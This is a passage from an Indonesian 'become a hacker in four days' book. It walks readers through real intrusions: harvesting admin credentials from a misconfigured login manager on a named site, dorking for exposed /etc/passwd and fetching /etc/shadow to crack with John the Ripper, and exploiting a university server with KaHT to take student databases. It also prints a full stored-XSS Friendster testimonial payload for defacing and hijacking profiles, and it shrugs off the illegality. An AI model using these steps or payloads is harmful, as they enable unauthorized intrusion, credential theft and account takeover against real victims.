4 HARI MENJADI HACKER

Gambar 4. 9 Situs yang memakai aplikasi Secure Login

Ups ... terlalu kecil yah ... coba kita perbesar sedikit yah

Gambar 4. 10 Karena kesalahan konfigurasi aplikasi situs


ini bisa menampilkan user dan password secara telanjang

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 134


4 HARI MENJADI HACKER

Nah kliatan kan kalau diperbesar, sengaja ditutup


pakek spidol biar gak kliatan user passwordnyah...
hahahahahah, kenapa bisa langsung menuju ke program
secure login???umh karena alamatnya yang kita cari di
google tadi langsung menuju ke :

http://www.ensaga.com/admin/SecureLoginManager/list.asp

Lalu apa yang bisa dilakukan ... ya coba dilihat di gambar


sebelumnya, itu kan ada user, password nyah ... nah security
levelnya pun tingkat admin toh ... ada beberapa user yang
tingkatnya adalah admin, gunakan itu untuk login ... Lah
halaman loginnya aja kita gak tau ... tenang – tenang, namanya
hacker selain mengandalkan kemampuan teknis, juga harus
mengandalkan L O G I K A, iyah logika ... seperti jurus
menaklukkan Secure Login v1.0 tadi anda udah baca kan ... ada
suatu fungsi untuk menampilkan atau mengalihkan user yang
tidak terdaftar ke halaman login...hayo masi inget gak???IYA
BENER ... pakek script

/set_preferences.asp

Okay waktunya mengubah alamat yang ada di web


browser, dari :

http://www.ensaga.com/admin/SecureLoginManager/list.asp

Menjadi…

http://www.ensaga.com/admin/SecureLoginManager/set_pr
eferences.asp

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 135


4 HARI MENJADI HACKER

5. Maka akan muncul halaman web dengan


gambar sbb yang langsung diperbesar aja yah ..

Gambar 4. 11 Halaman untuk mengetahui tempat login

Nah kalo udah muncul halaman kayak gini liat yang paling
atas, yang dilingkari pakek pulpen warna hitam, itulah
dia alamat form untuk login, tinggal dicopy ke web
browser, maka akan muncul form login tsb dan isi user
dan password sesuai dengan user dan password yang
anda dapatkan tadi ...

Gambar 4. 12 Halaman untuk mengetahui tempat login


yang diperbesar, biar jelas ajah

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 136


4 HARI MENJADI HACKER

4.4 MENJADI RAJA (ADMIN) DGN JURUS


CRACKING PASSWORD

Kita tidak perlu memakai metode yang sangat susah


sekali untuk mencari file password, jika ingin tahu..ya
baca sub bab sebelumnya saja. Contoh mencuri password
disini cukup menggunakan search engine google. Ikuti
langkah berikut untuk mencuri dan meng-crack
password:
1. Buka situs google di www.google.co.id
2. Kemudian ketik di search box-nya :
Inurl:/etc/passwd/
3. maka akan muncul link yang mengandung file
/etc/passwd yang kebetulan tertangkap oleh
google

Gambar 4. 13 Mencari file /etc/passwd dengan google

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 137


4 HARI MENJADI HACKER

4. Klik salah satu link tersebut, maka akan


menampilkan situs yang mempunyai file
/etc/passwd dan yang paling berbahaya, situs
tersebut menampilkan isi dari file /etc/passwd,
okay kita coba pilih yang .... www.lansys.ch aja
dey .. so bakal muncul seperti gambar berikut
seperti pada gambar berikut :

Gambar 4. 14 Isi file /etc/passwd dari suatu situs

5. God damn s***!!!! Mudah banget kan, berterima


kasih lah kepada pembuat google yang
mempermudah proses pencarian file ini ...

6. Okay, pada url bar di web browser anda tertulis:

http://www.lansys.ch/support/config/etc/passwd-

Coba sekarang diganti aja menjadi:

http://www.lansys.ch/support/config/etc/shadow-

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 138


4 HARI MENJADI HACKER

Kemudian jangan lupa tekan enter ...

7. Yang terjadi adalah pada web browser anda akan


ditampilkan file /etc/passwd dari website
tersebut, ih ... kok bisa mikir gitu mas??? Umh...
sekali lagi logika ... iya logika ... tadi pertama kali
kita udah bisa menampilkan file /etc/password di
web browser, pasti donk ... kalau si admin ini
tidak melindungi file yang penting ini otomatis file
penting lainnya juga tidak akan dilindungi oleh
dia ... betul gak ????(pembaca tersenyum dan
mengangguk – anggukan kepalanya... sambil
ngomong ”OOOO....”) ... gini nih ... kalo pas lagi
di kampus ... suruh ngerjain soal – soal integral,
turunan, limit dan lain – lain ... begitu ngerti
langsung OOO..... tapi tetep aja saya parah di
kalkulus ... secara di transkrip nilai ada ”D” –nya
kalkulus lagi...hadoh hadoh kesyiaaaaannn deh
gua ... lah malah curhat ... okay lanjut .. pada
web browser anda akan tampil file /etc/shadow
seperti gambar berikut :

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 139


4 HARI MENJADI HACKER

Gambar 4. 15 Isi file /etc/shadow dari suatu situs

8. Sekarang tinggal buka sopware John The Ripper


di DOS Shell ... O iya sebelumnya jangan lupa,
buka notepad dan simpan file /etc/passwd tadi
lewat notepad dengan nama passwd.txt, begitu
juga /etc/shadow, simpan dengan nama
shadow.txt …

9. Kemudian gabungkan file passwd.txt dan


shadow.txt dengan perintah :

Unshadow passwd.txt shadow.txt >> cracker.txt

JANGAN LUPA TEKAN ENTER …

Dengan perintah di atas, hasil penggabungan


tersebut akan digabung di file cracker.txt

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 140


4 HARI MENJADI HACKER

Gambar 4. 16 Menggabungkan file passwd.txt dan


shadow.txt dengan perintah unshadow

10. Naaaaaaa …. Setelah itu untuk melakukan crack


password tadi, cukup ketik perintah sbb:

John-mmx cracker.txt

Kemudian tekan enter …

Gambar 4. 17 crack password dari file yang telah


digabungkan tadi memakai perintah john-mmx

11. CRACKER JACK!!!! Pada gambar di atas ada


tulisan:

Cobra <birkr>

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 141


4 HARI MENJADI HACKER

Yang artinya user : cobra dan password : birkr, udah


deh tinggal login memakai user dan password
tersebut ... mudah yah ...

4.5 MENYUSUP DATABASE PERGURUAN TINGGI

Kenapa harus universitas she??? Hm….. gini loh …


sekarang ni banyak kejadian jual nilai … jual sertipikat,
jual ijazah …. Why why why … katanya bangsa indonesia
mo pinter … katanya bangsa indonesia mo berdiri dengan
kakinya sendiri????? Kok masi kayak gitu sih???? Masih
berjualan nilai, ijazah bahkan sertipikat. Pakek orang
dalam segala lagi… nah gimana kalo kita mengerjainya
ddari luar??? Atau tanpa memakai birokrasi pendidikan
alias tikus2 untuk menaikkan nilai di universitas sendiri
…..??????

PERSIAPAN

Okeh persiapannya gampang kok…, tinggal mengenali


apakah di sana maksudnya di kampus ada hotspot ato
tidak … kalo ada ya tinggal menyiapkan tools yang harus
di bawa..
1. Laptop .. jelas laptop lah wajib … jika di
universitas ada hotspot nah itu sasaran empuk
untuk di kerjai …

2. Persiapan kedua harus mengenali server di sana


… maksudnya server tersebut memakai jenis apa

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 142


4 HARI MENJADI HACKER

aja sih??? Jika memakai windows ya gunakan


atau kumpulkan exploit windows di laptop anda,
kalau pakai linux ya siapkan exploit linux di laptop
anda.

3. Nah selanjutnya adalah kendaraan untuk ke


kampus … untuk menjemput hotspot di sana …

4. Softwarer yang digunakan :


a. AngryIPscanner
b. Kaht
c. DOS (Diskette Operating System)

PROSES PENYUSUPAN

OKE INI bagian yang ditunggu tunggu kan ….. pertama


cari aja hotspot mo di perpus atau di lobby, mending cari
aja tempat sepi …

Bagaimana cara mengetahui IP Adress? Gampang …coba


lihat di kanan bawah windows … ada kan gambar icon
yang tersambung ke hotspot server … nah klik 2 kali aja:

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 143


4 HARI MENJADI HACKER

Gambar 4. 18 Properties untuk melihat informasi IP


Address

Na kliatan kan kita telah masuk kek jaringan hotspot nya


… soalnya server memakai metode DHCP, istilahnya
sambung langsung, jadi kita mendapat IP address
langsung:

IP Address :192.168.4.173(ip address


kita)

Subnet :255.255.255.0

Default Gateway :192.168.4.1 ( nah ini


adalah server gatewaynya atau istilahnya
wireless server nya lah).

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 144


4 HARI MENJADI HACKER

Nah kalau sudah kemudian gunakan AngryIPScanner


untuk memetakan jaringan yang di sana … seperti pada
gambar :

Gambar 4. 19 Memakai AngryIPScanner untuk mencari


IP Address dan IP Address server yang aktif

wow wow wow ternyata banyak yah server yang idup….


, pertama kita tentukan aja IP address yang discan …
misalnya 192.168.1.0 sampai 192.168.1.255. Di situ
terlihat kan ada komputer dosen – dosen dan server YKPN
itu sendiri …. Ck ck ck …kenapa harus memakai orang
dalem … orang luar aja bisa kok mengubah nya sendiri …
oke … kita pilih yang ada kata2 servernya SERVERBOX

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 145


4 HARI MENJADI HACKER

dengan IP adress 192.168.1.237 yah gambling ajah dulu


….

Setelah itu coba pakai exploit KaHT, apa itu KaHT, baca
aja sendiri … banyak di google okeh … cari ajah…:

Gambar 4. 20 KAHT untuk menjebol server

Untuk menjalankan KaHT harus masuk ke DOS mode


dulu, kemudian jalankan KaHT.exe nah setelah itu … akan
muncul gambar seperti di atas… untuk sintaks penulisan
KaHT adalah :

KaHT IP address1 [spasi] ipaddress2

Contoh penulisan untuk bisa masuk ke database YKPN:

KaHT 192.168.17.235 192.168.17.237

Nah setelah ketik sintaks di atas, tekan enter :

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 146


4 HARI MENJADI HACKER

Gambar 4. 21 KAHT melakukan eksploitasi terhadap


server
BANG BANG BANG!!!! Mati ………… kita sudah dapat
masuk ke host SERVERBOX, nah coba kita melihat2 isi
dalamnya yak … ada apa di sana:

Gambar 4. 22 Memeriksa direktori di server

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 147


4 HARI MENJADI HACKER

suit suit……… apa tuh perpustakaan.mdb,… kliatannya file


database tuh …. Silakan aja donlot … coba ke direktori
lainnya :

Gambar 4. 23 Menemukan file database mahasiswa

Hmmm…. Coba liat di gambar …. Wauw akademik-


info.adp ukurannya gigabyte … hmmm… silahkan aja lah
… teserah mo diapain …

---------------------------------------------------------------------
For admin please patch your system … mungkin serverbox
hanya sekedar infocenter … tapi dengan cara seperti ini
kemungkinan serverppmb atau yang lainnya dapat
dimasuki oleh yang lain …
---------------------------------------------------------------------

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 148


4 HARI MENJADI HACKER

4.6 MENJAHILI AJANG NARSIS FRIENDSTER (FS)

Kali ini suhu lain mau coba show off, yaitu


badguz_badboy, dari artikel di www.virologi.info saya
sarikan di buku ini sebagai berikut, perhatikan ya nak ...

Wah gila bgt kan klo FS u diubah ma orang lain??? Gimana


kesel pa g? pasti kesel donk klo halaman FS-nya kita ubah
hiii ngeri kan. But dimohon dgn sangat jangan salah
menggunakan script ini coz kasihan banget tuh yg punya
FS dah capek2 design ehh tiba2 diganti. Sebenernya sich
gw dah pake script ini dah 2 tahun yg lalu but coba aja
dech sapa tau masih bisa. Ikuti langkah berikut ini:

1. Isi aja testi teman kalian di FS dengan isi testi


kode berikut:

''''''''Begin Testimonial'''''''''''
Halo apa kabar ??? thanks yachh dah add gw...
<img src=http://mail.yahoo.com/config/login?/"" id="xxx"
style="height:expr_/**/ession(if(pageViewerID!=pageOwnerI
D){document.write('<body
bgcolor=black><b><br><br><center><font face=verdana
size=4pt color=white>HACKED BY bagus_badboy<br>Ur
Account Have been Deface by bagus_badboy<br><br>Sorry
Yach...<Br>Nothing is Secure..<br><Br><br><br>nobodys
servers is
safe..<br><br><br>bagus_badboy@yahoo.com<br></b>');doc
ument.title = '-friendster u gw ambil alih!!!-'});
width:expr_/**/ession(document.all.xxx.style.height='0px')"

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 149


4 HARI MENJADI HACKER

/></img>
''''''''''''''End Testimonial''''''''''''

Pasti di approve dunk … secara gitu FS kan ajang narsis,


SAPA SEH yang gak mau dikasi testi .. tul gak ..semakin
banyak testi berarti semakin banyak orang yang
memperhatikan kita dan semakin gede kepala deh kita …
hahahahahha

2. kemudian jika teman kalian telah meng-approve


atau menyetujui testimonial yang telah kalian
sisipkan kode tadi, maka teman teman anda
akan merasakan akibat yang ditimbulkan, yaitu:

a. Profile dibajak
b. Testi Hilang, mau testinya hilang?
c. Poto berubah jadi yang aneh, iya kalo
foto bener…kalo foto bugil??? Yang jelas
orang yang membajak dapat mengirim
pesan lewat account FS kita
d. Nama account berubah

Entah di bawah ini Friendster punya siapa saja (coba


perhatikan, siapa tahu salah satunya milik anda ☺ yang
jelas ini bukan untuk jago – jagoan kok … hanya untuk
ilmu dan peringatan gituh …

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 150


4 HARI MENJADI HACKER

Gambar 4. 24 Account Friendster yang dibajak

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 151


4 HARI MENJADI HACKER

Gambar 4. 25 Account Friendster lain yang dibajak

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 152


4 HARI MENJADI HACKER

Gambar 4. 26 Account Friendster siapa ini???

---------------------------------------------------------------------
Hati – hati dengan testimonial yang dikirimkan oleh teman
anda, jika mengandung kode – kode di atas
---------------------------------------------------------------------

Huahhhhhhhhhhhh!!!! Capek juga turun gunung …


mungkin sudah cukup 5 target dulu aja yak … Tiba – tiba
anda tertidur pulas, karena untuk menghajar lima target
tersebut memerlukan waktu, tenaga, pikiran dan
konsentrasi yang tinggi … zzz…ZZZZ…ZZ..zzz

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 153


4 HARI MENJADI HACKER

HARI KEEMPRAT
MAKSUDNYA KEEMPAT

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 154


4 HARI MENJADI HACKER

Bab V
Hari Keempat

IDIH .... KETANGKEP

Oahmmmm ... ternyata anda baru bangun setelah tadi


malem capek banget ... gara – gara melakukan
penjebolan server yang diajarkan di buku ini ....

”Loh Loh ... mana laptop gua???” , kata anda sambil


meraba – raba di lantai samping anda yang biasa
dijadikan tempat berpijak laptop anda ketika tidur.

”Kok dingin banget euy disini??” , kata anda lagi. Padahal


tadi malam anda tidur pakai selimut.

Wuah ... anda kaget ketika melihat ke sekeliling kamar


anda, kok gelap dan sangat sempit sekali ...

Mana bauk tikus lagi ... wah wah wah .... Mana lagi lemari
gua??? Tempat CD bajakan yang gua burning juga gak
ada ... ke mana semua barang – barang gua ??? apa
kemalingan yah???

anda mencoba keluar dari kamar yang emang suasananya


dingin dan gelap .... Tapi ternyata tertahan karena pintu
kamar anda terkunci.

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 155


4 HARI MENJADI HACKER

DUENNNNNNKKKKK
KKkk!!!!!!

Idih kegep (ketangkep)!!!!, pantes laptop gak ada, kamar


tambah sempit dan dingin, gak ada selimut pula ... but
it’s OK ... anda akan mengalami ini jika Hukum di
Indonesia ini apalagi hukum Cyberlaw benar – benar

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 156


4 HARI MENJADI HACKER

ditegakkan, selama belum ada aparat yang menganggap


serius tindak kejahatan cyber, anda bebas berkeliaran ☺

Jangan takut untuk mencoba, kesalahan manusia hanya


satu ”TIDAK PERNAH MENCOBA”. Gimana mau jadi
hacker, kalau tidak pernah mencoba menghacking
sistem??? Asal Cuma buat belajar ajah gpp kok ...
menghacking system itu gak masalah, yang bermasalah
itu menghacking system tapi ketahuan ... buahahahahah
!!!! mungkin memang saat ini hacking masih
dikategorikan sebagai tindak kejahatan ... LALU APA
GUNANYA BELAJAR HACKING??? Sia – sia kah?? Tentu
tidak, kan saya beri combantrin!!!(kayak iklan ajah)...ya
gak lah, segala sesuatu yang ada di dunia ini tidak ada
yang tidak bermanfaat, semua bermanfaat termasuk
mempelajari ilmu hacking. Umh ... coba misalnya kalau
anda sudah mengerti dan tahu tentang hacking,
kemungkinan anda akan dipekerjakan sebagai pakar
keamanan di suatu perusahaan, me-ngetes jaringan,
percobaan pembobolan, dan penetrasi jaringan ke suatu
perusahaan. Hal yang asik bukan, selain hobi tersalurkan
kita bisa menghidupi diri sendiri, jadi jangan takut untuk
belajar. Yang salah itu ”MENYEMBUNYIKAN INFORMASI
ATAU ILMU”, karena kita seorang ilmuwan. Saya pernah
mendengar dari seorang kawan, hacker itu memang
pintar dan jenius, tapi hanya untuk dirinya sendiri??? Umh
anggapan yang keliru sepertinya, buktinya echo.or.id,
jasakom, masih mau membagi ilmunya kok ... virologi
jugak (halah promosi besar – besaran). But it’s OK ...
ingat di atas langit masih ada langit. Seorang teman

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 157


4 HARI MENJADI HACKER

pernah menangkap basah penulis, Dia tauuuuu semua ttg


penulis ampe kejelekan yang sejelek – jeleknya dia tau,
padahal kami jarang sekali ngomong bareng, secara dia
juga punya indera ke-enam sih ... dan hanya membaca
garis tangan aja. Terlepas dari itu jangan pernah
sombong jika sudah menguasai ilmu, karena IPTEK ini
luas, jika anda menguasai ilmu hacking anda baru
menggapai IPTEK hanya seujung kuku saja. Cukup
sebarkan ilmu yang anda bisa ke orang – orang dan anda
akan mendapat manfaatnya, trust me ... (percaya deh
....)

Selamat berkreasi dengan cyberpunk, karena jika anda


sudah masuk ke dunia cyber, sama saja anda masuk ke
sebuah hutan belantara yang sangat lebat, tidak ada
penolong selain diri anda sendiri, anda pun dapat
memilih, menjadi pemangsa seperti si RAJA SINGA
(Bukan nama penyakit loh) atau hanya sebagai yang
dimangsa??? Sudah genap 4 hari anda mempelajari buku
ini, hanya anda yang tau apakah anda telah menjadi
hacker atau belum ???? Jangan ada kata menyerah untuk
belajar ... belajar dan belajar ... and the last word (akhir
kata) ... HAPPY HACKING!!!!!

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 158

Anda mungkin juga menyukai